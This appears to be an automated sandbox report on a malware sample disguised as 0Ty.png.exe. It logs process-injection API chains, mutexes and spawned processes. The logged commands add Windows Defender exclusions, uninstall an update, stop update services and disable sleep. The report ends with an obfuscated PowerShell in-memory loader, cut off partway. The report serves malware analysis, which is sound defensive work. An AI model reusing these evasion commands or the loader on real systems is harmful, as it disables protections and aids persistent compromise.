Code function: 72_2_000002BAAEE02990 NtEnumerateValueKey,NtEnumerateValueKey, |
72_2_000002BAAEE02990 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, |
73_2_0000000140001860 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AF63E |
28_2_00007FFD9B8AF63E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADD58 |
28_2_00007FFD9B8ADD58 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AE329 |
28_2_00007FFD9B8AE329 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AFDE9 |
28_2_00007FFD9B8AFDE9 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AF659 |
28_2_00007FFD9B8AF659 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADCD3 |
28_2_00007FFD9B8ADCD3 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_0000024089941FF4 |
31_3_0000024089941FF4 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_0000024089953CD8 |
31_3_0000024089953CD8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_000002408994D510 |
31_3_000002408994D510 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A2A48D8 |
31_2_000002408A2A48D8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A29E110 |
31_2_000002408A29E110 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A292BF4 |
31_2_000002408A292BF4 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_0000000140003240 |
64_2_0000000140003240 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_00000001400027D0 |
64_2_00000001400027D0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8ADD78 |
66_2_00007FFD9B8ADD78 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE349 |
66_2_00007FFD9B8AE349 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9BB23542 |
66_2_00007FFD9BB23542 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9BB230D1 |
66_2_00007FFD9BB230D1 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB483CD8 |
67_3_0000014ECB483CD8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB47D510 |
67_3_0000014ECB47D510 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB471FF4 |
67_3_0000014ECB471FF4 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4B48D8 |
67_2_0000014ECB4B48D8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4AE110 |
67_2_0000014ECB4AE110 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4A2BF4 |
67_2_0000014ECB4A2BF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001CF0 |
68_2_0000000140001CF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140002D54 |
68_2_0000000140002D54 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001274 |
68_2_0000000140001274 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140002434 |
68_2_0000000140002434 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_00000001400031D8 |
68_2_00000001400031D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC611FF4 |
69_3_00000225DC611FF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC623CD8 |
69_3_00000225DC623CD8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC61D510 |
69_3_00000225DC61D510 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC642BF4 |
69_2_00000225DC642BF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC6548D8 |
69_2_00000225DC6548D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC64E110 |
69_2_00000225DC64E110 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC672BF4 |
69_2_00000225DC672BF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC6848D8 |
69_2_00000225DC6848D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC67E110 |
69_2_00000225DC67E110 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0AB1FF4 |
70_3_00000202C0AB1FF4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0AC3CD8 |
70_3_00000202C0AC3CD8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0ABD510 |
70_3_00000202C0ABD510 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE2BF4 |
70_2_00000202C0AE2BF4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AF48D8 |
70_2_00000202C0AF48D8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AEE110 |
70_2_00000202C0AEE110 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612DD510 |
71_3_000002A6612DD510 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612D1FF4 |
71_3_000002A6612D1FF4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612E3CD8 |
71_3_000002A6612E3CD8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A66130E110 |
71_2_000002A66130E110 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A661302BF4 |
71_2_000002A661302BF4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A6613148D8 |
71_2_000002A6613148D8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDD1FF4 |
72_3_000002BAAEDD1FF4 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDDD510 |
72_3_000002BAAEDDD510 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDE3CD8 |
72_3_000002BAAEDE3CD8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE02BF4 |
72_2_000002BAAEE02BF4 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE0E110 |
72_2_000002BAAEE0E110 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE148D8 |
72_2_000002BAAEE148D8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB53CD8 |
73_3_00000248FFB53CD8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB4D510 |
73_3_00000248FFB4D510 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB41FF4 |
73_3_00000248FFB41FF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140001CF0 |
73_2_0000000140001CF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140002D54 |
73_2_0000000140002D54 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140002434 |
73_2_0000000140002434 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_00000001400031D8 |
73_2_00000001400031D8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140001274 |
73_2_0000000140001274 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000024880602BF4 |
73_2_0000024880602BF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_000002488060E110 |
73_2_000002488060E110 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_00000248806148D8 |
73_2_00000248806148D8 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7920:120:WilError_03 |
Source: C:\Windows\System32\dialer.exe |
Mutant created: \BaseNamedObjects\Global\gohkfyvqbpmecnid |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7928:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7784:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7888:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7492:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03 |
Source: unknown |
Process created: C:\Users\user\Desktop\0Ty.png.exe "C:\Users\user\Desktop\0Ty.png.exe" |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ" |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[- |